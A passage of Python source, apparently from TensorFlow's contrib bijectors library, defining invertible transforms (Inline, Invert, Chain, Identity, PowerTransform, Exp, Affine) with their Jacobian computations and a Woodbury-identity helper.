forward_fn=None,
inverse_fn=None,
inverse_log_det_jacobian_fn=None,
forward_log_det_jacobian_fn=None,
get_forward_event_shape_fn=None,
forward_event_shape_fn=None,
get_inverse_event_shape_fn=None,
inverse_event_shape_fn=None,
is_constant_jacobian=False,
validate_args=False,
name="inline"):
"""Creates a `Bijector` from callables.
Args:
forward_fn: Python callable implementing the forward transformation.
inverse_fn: Python callable implementing the inverse transformation.
inverse_log_det_jacobian_fn: Python callable implementing the
log o det o jacobian of the inverse transformation.
forward_log_det_jacobian_fn: Python callable implementing the
log o det o jacobian of the forward transformation.
get_forward_event_shape_fn: Python callable implementing non-identical
static event shape changes. Default: shape is assumed unchanged.
forward_event_shape_fn: Python callable implementing non-identical event
shape changes. Default: shape is assumed unchanged.
get_inverse_event_shape_fn: Python callable implementing non-identical
static event shape changes. Default: shape is assumed unchanged.
inverse_event_shape_fn: Python callable implementing non-identical event
shape changes. Default: shape is assumed unchanged.
is_constant_jacobian: `Boolean` indicating that the Jacobian is constant
for all input arguments.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String`, name given to ops managed by this object.
"""
super(Inline, self).__init__(
batch_ndims=0,
event_ndims=0,
is_constant_jacobian=is_constant_jacobian,
validate_args=validate_args,
name=name)
self._forward_fn = forward_fn
self._inverse_fn = inverse_fn
self._inverse_log_det_jacobian_fn = inverse_log_det_jacobian_fn
self._forward_log_det_jacobian_fn = forward_log_det_jacobian_fn
self._get_forward_event_shape_fn = get_forward_event_shape_fn
self._forward_event_shape_fn = forward_event_shape_fn
self._get_inverse_event_shape_fn = get_inverse_event_shape_fn
self._inverse_event_shape_fn = inverse_event_shape_fn
def _get_forward_event_shape(self, input_shape):
if self._get_forward_event_shape_fn is None:
# By default assume shape doesn't change.
return input_shape
return self._get_forward_event_shape_fn(input_shape)
def _forward_event_shape(self, input_shape):
if self._forward_event_shape_fn is None:
# By default assume shape doesn't change.
return input_shape
return self._forward_event_shape_fn(input_shape)
def _get_inverse_event_shape(self, output_shape):
if self._get_inverse_event_shape_fn is None:
# By default assume shape doesn't change.
return output_shape
return self._get_inverse_event_shape_fn(output_shape)
def _inverse_event_shape(self, output_shape):
if self._inverse_event_shape_fn is None:
# By default assume shape doesn't change.
return output_shape
return self._inverse_event_shape_fn(output_shape)
def _forward(self, x, **condition_kwargs):
if not callable(self._forward_fn):
raise NotImplementedError(
"forward_fn is not a callable function.")
return self._forward_fn(x, **condition_kwargs)
def _inverse(self, y, **condition_kwargs):
if not callable(self._inverse_fn):
raise NotImplementedError(
"inverse_fn is not a callable function.")
return self._inverse_fn(y, **condition_kwargs)
def _inverse_log_det_jacobian(self, y, **condition_kwargs):
if not callable(self._inverse_log_det_jacobian_fn):
raise NotImplementedError(
"inverse_log_det_jacobian_fn is not a callable function.")
return self._inverse_log_det_jacobian_fn(y, **condition_kwargs)
def _forward_log_det_jacobian(self, y, **condition_kwargs):
if not callable(self._forward_log_det_jacobian_fn):
raise NotImplementedError(
"forward_log_det_jacobian_fn is not a callable function.")
return self._forward_log_det_jacobian_fn(y, **condition_kwargs)
class Invert(Bijector):
"""Bijector which inverts another Bijector.
Example Use: [ExpGammaDistribution (see Background & Context)](
https://reference.wolfram.com/language/ref/ExpGammaDistribution.html)
models `Y=log(X)` where `X ~ Gamma`.
```python
exp_gamma_distribution = TransformedDistribution(
Gamma(alpha=1., beta=2.),
bijector.Invert(bijector.Exp())
```
"""
def __init__(self, bijector, validate_args=False, name=None):
"""Creates a `Bijector` which swaps the meaning of `inverse` and `forward`.
Note: An inverted bijector's `inverse_log_det_jacobian` is often more
efficient if the base bijector implements `_forward_log_det_jacobian`. If
`_forward_log_det_jacobian` is not implemented then the following code is
used:
```python
y = self.inverse(x, **condition_kwargs)
return -self.inverse_log_det_jacobian(y, **condition_kwargs)
```
Args:
bijector: Bijector instance.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String`, name given to ops managed by this object.
"""
self._bijector = bijector
super(Invert, self).__init__(
graph_parents=bijector.graph_parents,
is_constant_jacobian=bijector.is_constant_jacobian,
validate_args=validate_args,
dtype=bijector.dtype,
name=name or "_".join(["invert", bijector.name]))
self._shaper = bijector.shaper
def _get_forward_event_shape(self, input_shape):
return self.bijector.get_inverse_event_shape(input_shape)
def _forward_event_shape(self, input_shape):
return self.bijector.inverse_event_shape(input_shape)
def _get_inverse_event_shape(self, output_shape):
return self.bijector.get_forward_event_shape(output_shape)
def _inverse_event_shape(self, output_shape):
return self.bijector.forward_event_shape(output_shape)
@property
def bijector(self):
return self._bijector
def _forward(self, x, **condition_kwargs):
return self.bijector.inverse(x, **condition_kwargs)
def _inverse_and_inverse_log_det_jacobian(self, y, **condition_kwargs):
return (self.bijector.forward(y, **condition_kwargs),
self.bijector.forward_log_det_jacobian(y, **condition_kwargs))
def _forward_log_det_jacobian(self, x, **condition_kwargs):
return self.bijector.inverse_log_det_jacobian(x, **condition_kwargs)
class Chain(Bijector):
"""Bijector which applies a sequence of bijectors.
Example Use:
```python
chain = Chain([Exp(), Softplus()], name="one_plus_exp")
```
Results in:
* Forward:
```python
exp = Exp()
softplus = Softplus()
Chain([exp, softplus]).forward(x)
= exp.forward(softplus.forward(x))
= tf.exp(tf.log(1. + tf.exp(x)))
= 1. + tf.exp(x)
```
* Inverse:
```python
exp = Exp()
softplus = Softplus()
Chain([exp, softplus]).inverse(y)
= softplus.inverse(exp.inverse(y))
= tf.log(tf.exp(tf.log(y)) - 1.)
= tf.log(y - 1.)
```
"""
def __init__(self, bijectors=(), validate_args=False, name=None):
"""Instantiates `Chain` bijector.
Args:
bijectors: Python list of bijector instances. An empty list makes this
bijector equivalent to the `Identity` bijector.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String`, name given to ops managed by this object. Default: E.g.,
`Chain([Exp(), Softplus()]).name == "chain_of_exp_of_softplus"`.
Raises:
ValueError: if bijectors have different dtypes.
"""
self._bijectors = bijectors
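    # Derive a common dtype for the chain: `None` entries may appear next to
    # at most one concrete dtype (three or more distinct values are rejected
    # below).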
dtype = list(set([b.dtype for b in bijectors]))
if len(dtype) > 2:
raise ValueError("incompatible dtypes: %s" % dtype)
elif len(dtype) == 2:
dtype = dtype[1] if dtype[0] is None else dtype[0]
elif len(dtype) == 1:
dtype = dtype[0]
else:
dtype = None
super(Chain, self).__init__(
graph_parents=list(itertools.chain.from_iterable(
b.graph_parents for b in bijectors)),
is_constant_jacobian=all(b.is_constant_jacobian for b in bijectors),
validate_args=validate_args,
dtype=dtype,
name=name or ("identity" if not bijectors else
"_of_".join(["chain"] + [b.name for b in bijectors])))
@property
def bijectors(self):
return self._bijectors
def _shape_helper(self, func_name, input_shape, reverse):
new_shape = input_shape
for b in reversed(self.bijectors) if reverse else self.bijectors:
func = getattr(b, func_name, None)
if func is None:
raise ValueError("unable to call %s on bijector %s (%s)" %
(func_name, b.name, func))
new_shape = func(new_shape)
return new_shape
def _get_forward_event_shape(self, input_shape):
return self._shape_helper("get_forward_event_shape", input_shape,
reverse=True)
def _forward_event_shape(self, input_shape):
return self._shape_helper("forward_event_shape", input_shape, reverse=True)
def _get_inverse_event_shape(self, output_shape):
return self._shape_helper("get_inverse_event_shape", output_shape,
reverse=False)
def _inverse_event_shape(self, output_shape):
return self._shape_helper("inverse_event_shape", output_shape,
reverse=False)
def _forward(self, x, **condition_kwargs):
y = x
for b in reversed(self.bijectors):
y = b.forward(y, **condition_kwargs.get(b.name, {}))
return y
def _inverse_and_inverse_log_det_jacobian(self, y, **condition_kwargs):
x = y
ildj = constant_op.constant(0., dtype=x.dtype,
name="inverse_log_det_jacobian")
for b in self.bijectors:
x, j = b.inverse_and_inverse_log_det_jacobian(
x, **condition_kwargs.get(b.name, {}))
ildj += j
return x, ildj
def _forward_log_det_jacobian(self, x, **condition_kwargs):
y = x
fldj = constant_op.constant(0., dtype=x.dtype,
name="forward_log_det_jacobian")
for b in reversed(self.bijectors):
bijector_condition_kwargs = condition_kwargs.get(b.name, {})
fldj += b.forward_log_det_jacobian(y, **bijector_condition_kwargs)
y = b.forward(y, **bijector_condition_kwargs)
return fldj
class Identity(Bijector):
"""Bijector which computes Y = g(X) = X.
Example Use:
```python
  # Create the Y=g(X)=X transform which is intended for Tensors with 1 batch
  # ndim and 1 event ndim (i.e., vector of vectors).
  identity = Identity()
x = [[1., 2],
[3, 4]]
x == identity.forward(x) == identity.inverse(x)
```
"""
def __init__(self, validate_args=False, name="identity"):
super(Identity, self).__init__(
is_constant_jacobian=True,
validate_args=validate_args,
name=name)
def _forward(self, x):
return x
def _inverse_and_inverse_log_det_jacobian(self, y):
return y, constant_op.constant(0., dtype=y.dtype)
def _forward_log_det_jacobian(self, x):
return constant_op.constant(0., dtype=x.dtype)
class PowerTransform(Bijector):
"""Bijector which computes `Y = g(X) = (1 + X * c)**(1 / c), X >= -1 / c`.
The [power transform](https://en.wikipedia.org/wiki/Power_transform) maps
inputs from `[0, inf]` to `[-1/c, inf]`; this is equivalent to the `inverse`
of this bijector.
This bijector is equivalent to the `Exp` bijector when `c=0`.
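  A small worked example (annotation; the values follow directly from the
  formula above):

  ```python
  # With power=0.5: Y = (1 + 0.5 * X)**2, so X = 2. maps to (1 + 1.)**2 = 4.
  b = PowerTransform(power=0.5)
  y = b.forward(2.)  # ~4.
  x = b.inverse(4.)  # ~2.
  ```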
"""
def __init__(self,
power=0.,
event_ndims=0,
validate_args=False,
name="power_transform"):
"""Instantiates the `PowerTransform` bijector.
Args:
power: Python `float` scalar indicating the transform power, i.e.,
`Y = g(X) = (1 + X * c)**(1 / c)` where `c` is the `power`.
event_ndims: Python scalar indicating the number of dimensions associated
with a particular draw from the distribution.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
Raises:
ValueError: if `power < 0` or is not known statically.
"""
self._graph_parents = []
self._name = name
self._validate_args = validate_args
with self._name_scope("init", values=[power]):
power = tensor_util.constant_value(
ops.convert_to_tensor(power, name="power"))
if power is None or power < 0:
raise ValueError("`power` must be a non-negative TF constant.")
self._power = power
super(PowerTransform, self).__init__(
batch_ndims=0,
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
@property
def power(self):
"""The `c` in: `Y = g(X) = (1 + X * c)**(1 / c)`."""
return self._power
def _forward(self, x):
x = self._maybe_assert_valid_x(x)
if self.power == 0.:
return math_ops.exp(x)
# TODO(jvdillon): If large x accuracy is an issue, consider using
# (1. + x * self.power)**(1. / self.power) when x >> 1.
return math_ops.exp(math_ops.log1p(x * self.power) / self.power)
def _inverse_and_inverse_log_det_jacobian(self, y):
y = self._maybe_assert_valid_y(y)
if self.shaper is None:
raise ValueError("Jacobian cannot be computed with unknown event_ndims")
_, _, event_dims = self.shaper.get_dims(y)
if self.power == 0.:
x = math_ops.log(y)
ildj = -math_ops.reduce_sum(x, reduction_indices=event_dims)
return x, ildj
# TODO(jvdillon): If large y accuracy is an issue, consider using
# (y**self.power - 1.) / self.power when y >> 1.
x = _expm1(math_ops.log(y) * self.power) / self.power
ildj = (self.power - 1.) * math_ops.reduce_sum(
math_ops.log(y),
reduction_indices=event_dims)
return x, ildj
def _forward_log_det_jacobian(self, x):
x = self._maybe_assert_valid_x(x)
if self.shaper is None:
raise ValueError("Jacobian cannot be computed with unknown event_ndims")
_, _, event_dims = self.shaper.get_dims(x)
if self.power == 0.:
return math_ops.reduce_sum(x, reduction_indices=event_dims)
return (1. / self.power - 1.) * math_ops.reduce_sum(
math_ops.log1p(x * self.power),
reduction_indices=event_dims)
def _maybe_assert_valid_x(self, x):
if not self.validate_args or self.power == 0.:
return x
is_valid = check_ops.assert_non_negative(
1. + self.power * x,
message="Forward transformation input must be at least {}.".format(
-1. / self.power))
return control_flow_ops.with_dependencies([is_valid], x)
def _maybe_assert_valid_y(self, y):
if not self.validate_args:
return y
is_valid = check_ops.assert_positive(
y, message="Inverse transformation input must be greater than 0.")
return control_flow_ops.with_dependencies([is_valid], y)
class Exp(PowerTransform):
"""Bijector which computes Y = g(X) = exp(X).
Example Use:
```python
  # Create the Y=g(X)=exp(X) transform which operates on Tensors with 1
  # batch ndim and 2 event ndims (i.e., vector of matrices).
  exp = Exp(event_ndims=2)
x = [[[1., 2],
[3, 4]],
[[5, 6],
[7, 8]]]
exp(x) == exp.forward(x)
log(x) == exp.inverse(x)
```
Note: the exp(.) is applied element-wise but the Jacobian is a reduction
over the event space.
"""
def __init__(self,
event_ndims=0,
validate_args=False,
name="exp"):
"""Instantiates the `Exp` bijector.
Args:
event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
"""
super(Exp, self).__init__(
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
# TODO(srvasude): Deprecate this class with a dedicated Linear Operator
# corresponding to TriL + V D V.T.
class _TriLPlusVDVTLightweightOperatorPD(object):
"""Helper/hidden class fake an OperatorPD for TriL+VDV.T."""
def __init__(self, tril, v, diag=None, validate_args=False):
"""Creates an instance of _TriLPlusVDVTLightweightOperatorPD.
WARNING: This object is not to be used outside of `Affine` where it is
currently being temporarily used for refactoring purposes.
Args:
tril: `Tensor` of shape `[B1,..,Bb, d, d]`.
v: `Tensor` of shape `[B1,...,Bb, d, k]`.
diag: `Tensor` of shape `[B1,...,Bb, k, k]` or None
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
"""
self._m = tril
self._v = v
self._validate_args = validate_args
self._inputs = [tril, v]
if diag is not None:
self._inputs += [diag]
self._d = operator_pd_diag.OperatorPDDiag(diag, verify_pd=validate_args)
self._d_inv = operator_pd_diag.OperatorPDDiag(1. / diag,
verify_pd=validate_args)
return
if v.get_shape().is_fully_defined():
v_shape = v.get_shape().as_list()
id_shape = v_shape[:-2] + [v_shape[-1], v_shape[-1]]
else:
v_shape = array_ops.shape(v)
id_shape = array_ops.concat_v2(
[v_shape[:-2], [v_shape[-1], v_shape[-1]]], 0)
self._d = operator_pd_identity.OperatorPDIdentity(
id_shape, v.dtype, verify_pd=self.validate_args)
self._d_inv = self._d
@property
def inputs(self):
return self._inputs
@property
def dtype(self):
return self._m.dtype.base_dtype
@property
def validate_args(self):
return self._validate_args
def rank(self):
"""Returns `rank(self)`."""
return array_ops.rank(self._m)
def sqrt_matmul(self, x):
"""Computes `matmul(self, x)`.
Doesn't actually do the sqrt! Named as such to agree with API.
Args:
x: `Tensor`
Returns:
self_times_x: `Tensor`
"""
m_x = math_ops.matmul(self._m, x)
vt_x = math_ops.matmul(self._v, x, adjoint_a=True)
d_vt_x = self._d.matmul(vt_x)
v_d_vt_x = math_ops.matmul(self._v, d_vt_x)
return m_x + v_d_vt_x
def sqrt_solve(self, x):
"""Computes `solve(self, x)`.
Doesn't actually do the sqrt! Named as such to agree with API.
    To apply the inverse of (M + V D V.T), we use the Woodbury matrix
    identity:
inv(M + V D V.T) = inv(M) - inv(M) V inv(C) V.T inv(M)
where,
C = inv(D) + V.T inv(M) V.
See: https://en.wikipedia.org/wiki/Woodbury_matrix_identity
Args:
x: `Tensor`
Returns:
inv_of_self_times_x: `Tensor`
"""
minv_x = linalg_ops.matrix_triangular_solve(self._m, x)
vt_minv_x = math_ops.matmul(self._v, minv_x, transpose_a=True)
cinv_vt_minv_x = linalg_ops.matrix_solve(
self._woodbury_sandwiched_term(), vt_minv_x)
v_cinv_vt_minv_x = math_ops.matmul(self._v, cinv_vt_minv_x)
minv_v_cinv_vt_minv_x = linalg_ops.matrix_triangular_solve(
self._m, v_cinv_vt_minv_x)
return minv_x - minv_v_cinv_vt_minv_x
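  # Plain-numpy sketch of the identity above (annotation; M, V, D stand for
  # small dense arrays):
  #   Minv = np.linalg.inv(M)
  #   C = np.linalg.inv(D) + V.T.dot(Minv).dot(V)
  #   lhs = np.linalg.inv(M + V.dot(D).dot(V.T))
  #   rhs = Minv - Minv.dot(V).dot(np.linalg.inv(C)).dot(V.T).dot(Minv)
  #   np.testing.assert_allclose(lhs, rhs)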
def sqrt_log_abs_det(self):
"""Computes (log o abs o det)(X) for matrix X.
Doesn't actually do the sqrt! Named as such to agree with API.
To compute det(M + V D V.T), we use the matrix determinant lemma:
      det(M + V D V.T) = det(C) det(D) det(M)
    where C is defined as in `sqrt_solve`, i.e.,
      C = inv(D) + V.T inv(M) V.
See: https://en.wikipedia.org/wiki/Matrix_determinant_lemma
Returns:
log_abs_det: `Tensor`.
"""
log_det_c = math_ops.log(math_ops.abs(
linalg_ops.matrix_determinant(self._woodbury_sandwiched_term())))
# Reduction is ok because we always prepad inputs to this class.
log_det_m = math_ops.reduce_sum(math_ops.log(math_ops.abs(
array_ops.matrix_diag_part(self._m))), reduction_indices=[-1])
return log_det_c + 2. * self._d.sqrt_log_abs_det() + log_det_m
def _woodbury_sandwiched_term(self):
"""Computes the sandwiched term in the Woodbury identity.
Computes the "`C`" in the the identity:
inv(M + V D V.T) = inv(M) - inv(M) V inv(C) V.T inv(M)
where,
C = inv(D) + V.T inv(M) V.
See: https://en.wikipedia.org/wiki/Woodbury_matrix_identity
Returns:
woodbury_sandwich_term: A `Tensor` to be used like `C`, above.
"""
minv_v = linalg_ops.matrix_triangular_solve(self._m, self._v)
vt_minv_v = math_ops.matmul(self._v, minv_v, adjoint_a=True)
return self._d_inv.add_to_tensor(vt_minv_v)
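def _woodbury_identities_numpy_check():
  """Editor's illustrative sketch -- not part of the original TF source.

  Verifies with plain NumPy, on small dense matrices, the two identities
  `_TriLPlusVDVTLightweightOperatorPD` relies on: the Woodbury matrix
  identity (used by `sqrt_solve`) and the matrix determinant lemma (used by
  `sqrt_log_abs_det`). Every name below is local to this sketch.
  """
  import numpy as np
  rng = np.random.RandomState(0)
  d, k = 4, 2
  m = np.tril(rng.randn(d, d)) + d * np.eye(d)  # well-conditioned TriL M.
  v = rng.randn(d, k)
  diag = rng.rand(k) + 1.                       # entries of D.
  a = m + np.matmul(np.matmul(v, np.diag(diag)), v.T)
  # Woodbury: inv(A) = inv(M) - inv(M) V inv(C) V.T inv(M), where
  # C = inv(D) + V.T inv(M) V.
  m_inv = np.linalg.inv(m)
  c = np.diag(1. / diag) + np.matmul(np.matmul(v.T, m_inv), v)
  correction = np.matmul(
      np.matmul(np.matmul(np.matmul(m_inv, v), np.linalg.inv(c)), v.T),
      m_inv)
  assert np.allclose(m_inv - correction, np.linalg.inv(a))
  # Matrix determinant lemma: det(A) = det(C) det(D) det(M); for triangular
  # M, det(M) is the product of its diagonal.
  assert np.allclose(
      np.linalg.det(a),
      np.linalg.det(c) * np.prod(diag) * np.prod(np.diag(m)))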
class Affine(Bijector):
# pylint: disable=line-too-long
"""Bijector which computes `Y = g(X; shift, scale) = matmul(scale, X) + shift` where `scale = c * I + diag(D1) + tril(L) + V @ diag(D2) @ V.T`.
Write `A @ X` for `matmul(A, X)`. In TF parlance, the `scale` term is
logically equivalent to:
```python
scale = (
scale_identity_multiplier * tf.diag(tf.ones(d)) +
tf.diag(scale_diag) +
scale_tril +
scale_perturb_factor @ diag(scale_perturb_diag) @
      tf.transpose(scale_perturb_factor)
)
```
The `scale` term is applied without necessarily materializing constituent
matrices, i.e., the matmul is [matrix-free](
https://en.wikipedia.org/wiki/Matrix-free_methods) when possible.
Examples:
```python
# Y = X
b = Affine()
# Y = X + shift
b = Affine(shift=[1., 2, 3])
# Y = 2 * I @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_identity_multiplier=2.)
# Y = tf.diag(d1) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_diag=[-1., 2, 1]) # Implicitly 3x3.
# Y = (I + v * v.T) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_perturb_factor=[[1., 0],
[0, 1],
[1, 1]])
# Y = (diag(d1) + v * diag(d2) * v.T) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_diag=[1., 3, 3], # Implicitly 3x3.
scale_perturb_diag=[2., 1], # Implicitly 2x2.
scale_perturb_factor=[[1., 0],
[0, 1],
[1, 1]])
```
"""
# pylint: enable=line-too-long
def __init__(self,
shift=None,
scale_identity_multiplier=None,
scale_diag=None,
scale_tril=None,
scale_perturb_factor=None,
scale_perturb_diag=None,
event_ndims=1,
validate_args=False,
name="affine"):
"""Instantiates the `Affine` bijector.
This `Bijector` is initialized with `shift` `Tensor` and `scale` arguments,
giving the forward operation:
```none
Y = g(X) = scale @ X + shift
```
where the `scale` term is logically equivalent to:
```python
scale = (
scale_identity_multiplier * tf.diag(tf.ones(d)) +
tf.diag(scale_diag) +
scale_tril +
scale_perturb_factor @ diag(scale_perturb_diag) @
          tf.transpose(scale_perturb_factor)
)
```
If none of `scale_identity_multiplier`, `scale_diag`, or `scale_tril` are
specified then `scale += IdentityMatrix`. Otherwise specifying a
`scale` argument has the semantics of `scale += Expand(arg)`, i.e.,
`scale_diag != None` means `scale += tf.diag(scale_diag)`.
Args:
shift: Numeric `Tensor`. If this is set to `None`, no shift is applied.
      scale_identity_multiplier: floating point rank 0 `Tensor` representing a
        scaling done to the identity matrix.
        When `scale_identity_multiplier = scale_diag = scale_tril = None` the
        `scale` term defaults to the identity matrix; otherwise the (scaled)
        identity is added to `scale` only when `scale_identity_multiplier` is
        specified.
scale_diag: Numeric `Tensor` representing the diagonal matrix.
`scale_diag` has shape [N1, N2, ... k], which represents a k x k
diagonal matrix.
When `None` no diagonal term is added to `scale`.
      scale_tril: Numeric `Tensor` representing the lower triangular matrix.
        `scale_tril` has shape [N1, N2, ... k, k], which represents a k x k
lower triangular matrix.
When `None` no `scale_tril` term is added to `scale`.
scale_perturb_factor: Numeric `Tensor` representing factor matrix with
last two dimensions of shape `(k, r)`.
When `None`, no rank-r update is added to `scale`.
scale_perturb_diag: Numeric `Tensor` representing the diagonal matrix.
`scale_perturb_diag` has shape [N1, N2, ... r], which represents an
        r x r diagonal matrix.
When `None` low rank updates will take the form `scale_perturb_factor *
scale_perturb_factor.T`.
event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution. Must be 0 or 1.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
Raises:
ValueError: if `perturb_diag` is specified but not `perturb_factor`.
TypeError: if `shift` has different `dtype` from `scale` arguments.
"""
self._graph_parents = []
self._name = name
self._validate_args = validate_args
# Ambiguous definition of low rank update.
if scale_perturb_diag is not None and scale_perturb_factor is None:
raise ValueError("When scale_perturb_diag is specified, "
"scale_perturb_factor must be specified.")
# Special case, only handling a scaled identity matrix. We don't know its
# dimensions, so this is special cased.
# We don't check identity_multiplier, since below we set it to 1. if all
# other scale args are None.
self._is_only_identity_multiplier = (scale_tril is None and
scale_diag is None and
scale_perturb_factor is None)
# When no args are specified, pretend the scale matrix is the identity
# matrix.
if self._is_only_identity_multiplier and scale_identity_multiplier is None:
scale_identity_multiplier = 1.
with self._name_scope("init", values=[
shift, scale_identity_multiplier, scale_diag, scale_tril,
scale_perturb_diag, scale_perturb_factor, event_ndims]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
if validate_args:
is_less_than_two = check_ops.assert_less(
event_ndims, 2,
message="event_ndims must be 0 or 1")
event_ndims = control_flow_ops.with_dependencies(
[is_less_than_two], event_ndims)
self._shift = _as_tensor(shift, "shift")
# self._create_scale_operator returns an OperatorPD in all cases except if
# self._is_only_identity_multiplier; in which case it returns a scalar
# Tensor.
self._scale = self._create_scale_operator(
identity_multiplier=scale_identity_multiplier,
diag=scale_diag,
tril=scale_tril,
perturb_diag=scale_perturb_diag,
perturb_factor=scale_perturb_factor,
event_ndims=event_ndims,
validate_args=validate_args)
if (self._shift is not None and
self._shift.dtype.base_dtype != self._scale.dtype.base_dtype):
raise TypeError("shift.dtype({}) does not match scale.dtype({})".format(
self._shift.dtype, self._scale.dtype))
super(Affine, self).__init__(
batch_ndims=self._infer_batch_ndims(),
event_ndims=event_ndims,
        graph_parents=(
            [event_ndims] +
            ([self._scale] if contrib_framework.is_tensor(self._scale)
             else self._scale.inputs) +
            ([self._shift] if self._shift is not None else [])),
is_constant_jacobian=True,
validate_args=validate_args,
name=name)
def _create_scale_operator(self, identity_multiplier, diag, tril,
perturb_diag, perturb_factor, event_ndims,
validate_args):
"""Construct `scale` from various components.
Args:
identity_multiplier: floating point rank 0 `Tensor` representing a scaling
done to the identity matrix.
diag: Numeric `Tensor` representing the diagonal matrix. `scale_diag` has
shape [N1, N2, ... k], which represents a k x k diagonal matrix.
      tril: Numeric `Tensor` representing the lower triangular matrix.
        `scale_tril` has shape [N1, N2, ... k, k], which represents a k x k
        lower triangular matrix.
perturb_diag: Numeric `Tensor` representing the diagonal matrix of the
low rank update.
perturb_factor: Numeric `Tensor` representing factor matrix.
event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions
        associated with a particular draw from the distribution. Must be 0 or 1.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
Returns:
scale and batch_ndims. In the case of scaling by a constant, scale is a
floating point `Tensor`. Otherwise, scale is an `OperatorPD`.
Raises:
ValueError: if all of `tril`, `diag` and `identity_multiplier` are `None`.
"""
identity_multiplier = _as_tensor(identity_multiplier, "identity_multiplier")
diag = _as_tensor(diag, "diag")
tril = _as_tensor(tril, "tril")
perturb_diag = _as_tensor(perturb_diag, "perturb_diag")
perturb_factor = _as_tensor(perturb_factor, "perturb_factor")
identity_multiplier = self._maybe_validate_identity_multiplier(
identity_multiplier, validate_args)
if perturb_factor is not None:
perturb_factor = self._process_matrix(
perturb_factor, min_rank=2, event_ndims=event_ndims)
if perturb_diag is not None:
perturb_diag = self._process_matrix(
perturb_diag, min_rank=1, event_ndims=event_ndims)
    # The following if-statements are ordered by increasingly strong
# assumptions in the base matrix, i.e., we process in the order:
# TriL, Diag, Identity.
if tril is not None:
tril = self._preprocess_tril(
identity_multiplier, diag, tril, event_ndims)
if perturb_factor is None:
return operator_pd_cholesky.OperatorPDCholesky(
tril, verify_pd=validate_args)
return _TriLPlusVDVTLightweightOperatorPD(
tril=tril, v=perturb_factor, diag=perturb_diag,
validate_args=validate_args)
if diag is not None:
diag = self._preprocess_diag(identity_multiplier, diag, event_ndims)
if perturb_factor is None:
return operator_pd_diag.OperatorPDSqrtDiag(
diag, verify_pd=validate_args)
return operator_pd_vdvt_update.OperatorPDSqrtVDVTUpdate(
operator=operator_pd_diag.OperatorPDDiag(
diag, verify_pd=validate_args),
v=perturb_factor,
diag=perturb_diag,
verify_pd=validate_args)
if identity_multiplier is not None:
if perturb_factor is None:
return identity_multiplier
# Infer the shape from the V and D.
v_shape = array_ops.shape(perturb_factor)
identity_shape = array_ops.concat_v2((v_shape[:-1], (v_shape[-2],)), 0)
scaled_identity = operator_pd_identity.OperatorPDIdentity(
identity_shape,
perturb_factor.dtype.base_dtype,
scale=identity_multiplier,
verify_pd=validate_args)
return operator_pd_vdvt_update.OperatorPDSqrtVDVTUpdate(
operator=scaled_identity,
v=perturb_factor,
diag=perturb_diag,
verify_pd=validate_args)
raise ValueError("One of tril, diag and/or identity_multiplier must be "
"specified.")
def _maybe_validate_identity_multiplier(self, identity_multiplier,
validate_args):
"""Check that the init arg `identity_multiplier` is valid."""
    if identity_multiplier is None or not validate_args:
      return identity_multiplier
    return control_flow_ops.with_dependencies(
        [check_ops.assert_positive(identity_multiplier)],
        identity_multiplier)
def _preprocess_tril(self, identity_multiplier, diag, tril, event_ndims):
"""Helper to preprocess a lower triangular matrix."""
tril = array_ops.matrix_band_part(tril, -1, 0) # Zero out TriU.
if identity_multiplier is None and diag is None:
return self._process_matrix(tril, min_rank=2, event_ndims=event_ndims)
new_diag = array_ops.matrix_diag_part(tril)
if identity_multiplier is not None:
new_diag += identity_multiplier
if diag is not None:
new_diag += diag
tril = array_ops.matrix_set_diag(tril, new_diag)
return self._process_matrix(tril, min_rank=2, event_ndims=event_ndims)
def _preprocess_diag(self, identity_multiplier, diag, event_ndims):
"""Helper to preprocess a diagonal matrix."""
if identity_multiplier is not None:
diag += identity_multiplier
return self._process_matrix(diag, min_rank=1, event_ndims=event_ndims)
def _process_matrix(self, matrix, min_rank, event_ndims):
"""Helper to __init__ which gets matrix in batch-ready form."""
# Pad the matrix so that matmul works in the case of a matrix and vector
# input. Keep track if the matrix was padded, to distinguish between a
# rank 3 tensor and a padded rank 2 tensor.
    # TODO(srvasude): Remove side-effects from functions. It's currently
    # unbroken but error-prone since the function call order may change in the
    # future.
self._rank_two_event_ndims_one = math_ops.logical_and(
math_ops.equal(array_ops.rank(matrix), min_rank),
math_ops.equal(event_ndims, 1))
left = array_ops.where(self._rank_two_event_ndims_one, 1, 0)
pad = array_ops.concat_v2([
array_ops.ones([left], dtype=dtypes.int32),
array_ops.shape(matrix)], 0)
return array_ops.reshape(matrix, pad)
def _infer_batch_ndims(self):
"""Return batch_ndims."""
if self._is_only_identity_multiplier:
return 0
    # The actual number of batch dims is one less when we padded the matrix,
    # i.e., when event_ndims == 1 and the underlying scale has rank 2. This
    # keeps the number of sample dims non-negative.
return (self._scale.rank() - 2 -
array_ops.where(self._rank_two_event_ndims_one, 1, 0))
@property
def shift(self):
return self._shift
@property
def scale(self):
# TODO(srvasude): Remove this exception once TriLPlusVDVT is properly
# implemented.
if isinstance(self._scale, _TriLPlusVDVTLightweightOperatorPD):
raise NotImplementedError("Cannot access scale when Tril+VDV.T.")
return self._scale
def _forward(self, x):
y = x
if self._is_only_identity_multiplier:
y *= self._scale
if self.shift is not None:
return y + self.shift
return y
y, sample_shape = self.shaper.make_batch_of_event_sample_matrices(y)
y = self._scale.sqrt_matmul(y)
y = self.shaper.undo_make_batch_of_event_sample_matrices(y, sample_shape)
if self.shift is not None:
return y + self.shift
return y
def _inverse(self, y):
x = y
